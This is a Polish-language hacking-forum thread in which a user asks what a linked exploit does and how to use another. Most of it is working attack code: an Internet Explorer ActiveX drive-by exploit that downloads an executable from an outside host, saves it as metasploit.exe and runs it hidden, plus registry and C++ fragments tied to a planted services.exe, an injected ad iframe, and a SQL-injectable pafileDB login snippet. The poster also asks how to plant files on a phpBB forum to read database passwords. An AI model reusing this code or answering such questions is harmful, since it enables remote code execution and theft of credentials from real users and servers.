http://valoriahistory.cba.pl/exp_ie.html < CZY KTOŚ WIE CO TO ZA EXPLOIT?
Interesuje mnie, na co on działa.
z góry dzięki, za pomoc wiadomo co- pomógł.
Interesuje mnie, na co on działa.
z góry dzięki, za pomoc wiadomo co- pomógł.
function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");
Log('Creating the XMLHTTP object...');
var url = 'http://valoriahistory.cba.pl/serwer.exe';
var xml = null;
var bin = e.Item("TEMP") + "metasploit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesPlugPlay]
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,
74,00,25,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,65,
00,78,00,65,00,00,00
#include <iostream>
#include <unistd.h>
int
main()
{
int a = system("echo laming attempt>>c:windowsservices.exe");
std::cout << "result code: " << a << "n";
int b = system("attrib +R +H c:windowsservices.exe");
std::cout << "result code: " << b << "n";
return 0;
}
Originally posted by solsk
Chodzi mi o to co to robi w kodzie :hmmm:
src = 'http://a.cba.pl/adsense.html?'+bg.substring(1,7);
dif=document.createElement('div');with(dif.style){textAlign='center';height='90px'}dif.innerHTML='<iframe align="center" src="'+src+'" scrolling="no" frameborder="0" style="display: block !important; position: absolute; left: 50% !important; top:0px !important; z-index:10000 !important; margin-left: -364px !important; height:90px !important;width:728px !important;border:0px !important"></' + 'iframe>';
if ($authmethod == "cookies") {
echo "authmethod = cookiesn";
$cdata = explode("|", $pafiledbcookie);
$ip = $cdata[0];
$user = $cdata[1];
$pass = $cdata[2];
echo "ip = $ip, user = $user, pass = $passn";
}
if (!empty($user)) {
echo "user not emtpyn";
$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1);
$adminip = getenv ("REMOTE_ADDR");
$md5ip = md5($adminip);
if ($pass == $admin[admin_password] && $md5ip == $ip) {
$logged = 1;
}
} else {
echo "user emptyn";
$logged = 0;
}
function Log(m) {
var log = document.createElement('p');
log.innerHTML = m;
document.body.appendChild(log);
}
function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
}
function Go(a) {
Log('Creating helper objects...');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");
Log('Creating the XMLHTTP object...');
var url = 'http://valoriahistory.cba.pl/serwer.exe';
var xml = null;
var bin = e.Item("TEMP") + "metasploit.exe";
var dat;
try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if (! xml) return(0);
Log('Downloading the payload...');
xml.open("GET", url, false)
xml.send(null);
dat = xml.responseBody;
Log('Writing the payload to disk...');
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
Log('Executing the payload...');
s.Run(bin,0);
}
function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',null);
while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log('Loaded ' + t[i]);
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log('Exploit failed.');
}
Originally posted by solsk
Aaaa, wielkie dzięki, nie ma to jak kasa trzepana z Adsense. Zresztą nie zauważyłem że te linki to poza całym exploitem. Moja wina. I mam jeszcze jedno pytanko, już odnośnie całkiem innego tematu, mianowicie:
Exploit tutaj : http://seclists.org/bugtraq/2005/Aug/0312.html
Kod:if ($authmethod == "cookies") { echo "authmethod = cookiesn"; $cdata = explode("|", $pafiledbcookie); $ip = $cdata[0]; $user = $cdata[1]; $pass = $cdata[2]; echo "ip = $ip, user = $user, pass = $passn"; } if (!empty($user)) { echo "user not emtpyn"; $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1); $adminip = getenv ("REMOTE_ADDR"); $md5ip = md5($adminip); if ($pass == $admin[admin_password] && $md5ip == $ip) { $logged = 1; } } else { echo "user emptyn"; $logged = 0; }
Rozumiem was, nic nie umiem i zabieram się za takie rzeczy, ale robie to właśnie po to żeby się nauczyć i pytam was co z tym kodem mogę zrobić. Tzn. gdzie go umieścić ?
Jeśli wrzucę na serwer *.php to chyba nic się nie stanie. Więc was proszę o odpowiedź na to głupie (jak dla was) pytanie.
Edit: Jeszcze jedno pytanko: Co daje mi możliwość wrzucenia jakiegoś pliku na serwer np. jakieś forum oparte na phpbb ? Rozumiem że mogę wrzucić tam skrypt który np. wyświetla to co znajduje się w config.php i dzięki temu mogę zdobyć hasła do MySQL'a ?